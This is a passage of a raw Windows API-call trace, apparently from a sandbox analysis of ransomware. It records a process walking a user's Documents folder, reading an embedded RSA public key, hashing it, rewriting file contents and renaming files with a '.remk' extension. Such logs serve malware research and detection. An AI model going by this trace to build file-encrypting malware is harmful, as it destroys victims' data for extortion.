[0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.064] GetCurrentThreadId () returned 0x314 [0232.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5498 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee118 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee130 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee100 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee148 [0232.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1a8 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee148 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee118 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee118 | out: hHeap=0x630000) returned 1 [0232.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee100 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee0e8 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c1d88 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.069] WriteFile (in: hFile=0x640, lpBuffer=0x37bb408*, nNumberOfBytesToWrite=0x13f2, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37bb408*, lpNumberOfBytesWritten=0x3adfb14*=0x13f2, lpOverlapped=0x0) returned 1 [0232.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb408 | out: hHeap=0x630000) returned 1 [0232.070] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.070] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.070] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.070] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.070] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.071] CloseHandle (hObject=0x640) returned 1 [0232.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0232.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.074] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WsiU9HhiMmh5taXUMi.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wsiu9hhimmh5taxumi.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WsiU9HhiMmh5taXUMi.odp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wsiu9hhimmh5taxumi.odp.remk")) returned 1 [0232.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.075] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.077] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3544ca0, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0x22fedc50, ftLastAccessTime.dwHighDateTime=0x1d5e5ef, ftLastWriteTime.dwLowDateTime=0x22fedc50, ftLastWriteTime.dwHighDateTime=0x1d5e5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X0h6NwRPaRX5m", cAlternateFileName="X0H6NW~1")) returned 1 [0232.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0232.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ce8 [0232.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3ce8 | out: hHeap=0x630000) returned 1 [0232.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0232.077] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5b08260, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x2b34d7e0, ftLastAccessTime.dwHighDateTime=0x1d5e4b3, ftLastWriteTime.dwLowDateTime=0x2b34d7e0, ftLastWriteTime.dwHighDateTime=0x1d5e4b3, nFileSizeHigh=0x0, nFileSizeLow=0x3f33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zc2zwOgAl9dWZ8.pptx", cAlternateFileName="ZC2ZWO~1.PPT")) returned 1 [0232.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0232.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.077] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zc2zwOgAl9dWZ8.pptx") returned=".pptx" [0232.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zc2zwOgAl9dWZ8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zc2zwogal9dwz8.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.078] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=16179) returned 1 [0232.078] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.081] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3f0d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.081] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.083] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.083] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x3f33, lpOverlapped=0x0) returned 1 [0232.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.084] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.084] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.085] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.085] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.085] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.085] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.085] GetLastError () returned 0x0 [0232.085] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.085] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.085] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.085] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.085] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3f30) returned 0x37bb408 [0232.086] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1d88 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee0e8 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1dd0 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee100 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee130 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee148 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.086] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.087] RtlAllocateHeap (HeapHandle=0x630000, 